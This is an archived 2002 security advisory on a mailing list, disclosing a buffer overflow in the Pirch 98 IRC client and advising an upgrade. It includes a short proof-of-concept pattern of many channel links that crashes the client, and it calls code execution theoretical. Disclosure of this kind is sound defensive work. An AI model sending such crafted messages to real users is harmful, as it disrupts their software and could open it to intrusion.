OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: David Rude II (davidthegain.com)
Date: Fri Jun 21 2002 - 03:48:48 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ('binary' encoding is not supported, stored as-is) Author: David D. Rude II davidthegain.com
    Release Date: June 20th 2002
    Systems Affected: All versions of Windows Capable of running this
    software.
    Severity: Medium
    Credits: Cryptix from irc.pulltheplug.com
     
     
    Introduction:
    This bug was discovered a very long time ago by cryptix. When I was made
    aware of the problem which existed in pirch 98 I tried to contact the
    pirch developers to no avail. So I decided to keep this bug unreleased for
    quite some time. The reason I am releasing this advisory now is because a
    new version of pirch has been released and can be downloaded at pirch.com
    and it is no longer vulnerable to this kind of attack. I might have made a
    bad decision in keeping this advisory to myself however it was my choice
    at the time.
     
    Pirch is a irc client which many windows users use as a replacement for
    MIRC and other windows irc clients. It runs on many platforms of windows.
     
    Details:
    A buffer overflow exists in pirch 98 which could potentially allow remote
    execution of arbitrary code. The overflow exists in the way that pirch 98
    handles links. When I say links I mean hyperlinks to other channels and
    websites and possibly other forms of hyperlinks. The problem occurs when a
    long buffer is sent in either a channel or a private message. As far as I
    can tell the problem does not exist within the DCC Chat feature.
     
    To properly overflow the pirch98 irc client the buffer must be formated
    correctly and there must be a specific amount of links in the buffer.
     
    Proof of Concept:
    If you run the a irc client (anyone you wish) and also run the pirch98
    client you can test this out for your self.
     
    Here is an example of the properly formated buffer:
    #t #e #s #t #i #n #g #t #e #s #t #i #n #g #t #e #s #t #i #n #g #t #e #s #t
    #i #n #g #t #e #s #t #i #n #g ........<lots of channel links>
     
    As you will discover to get the correct amount of hyper links to overflow
    the client you need to make the links as short as possible.
     
    Exploitation:
    Exploiting this vulnerability is theoretically possible. However it would
    be very difficult to do. In what area are you going to place the
    shellcode? That maybe the toughest question to answer in this situation.
    Under the right conditions it is certainly plausable to think that
    exploitation can occur.
     
    The Fix:
    The most obvious solution here is to upgrade to the latest version of
    pirch. It can be downloaded at www.pirch.com.